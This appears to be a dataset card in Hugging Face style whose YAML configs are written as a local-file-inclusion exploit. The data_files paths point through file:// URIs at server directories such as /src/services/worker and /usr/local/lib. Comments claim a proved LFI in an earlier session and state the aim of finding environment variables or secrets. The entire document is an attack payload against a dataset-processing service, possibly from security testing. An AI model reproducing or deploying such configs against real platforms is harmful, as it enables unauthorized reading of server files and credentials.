--- configs: # EXACT path that caused CastError (proved LFI) in first session - config_name: "worker_src_1776561384" data_files: - split: train path: "file:///src/services/worker/**/*.json" # Also try: read boto3/botocore from worker's own Python env - config_name: "boto_json_1776561384" data_files: - split: train path: "file:///usr/local/lib/**/*.json" # Try reading worker source for env vars or secrets - config_name: "src_json_1776561384" data_files: - split: train path: "file:///src/**/*.json" --- # LFI retest original path 1776561384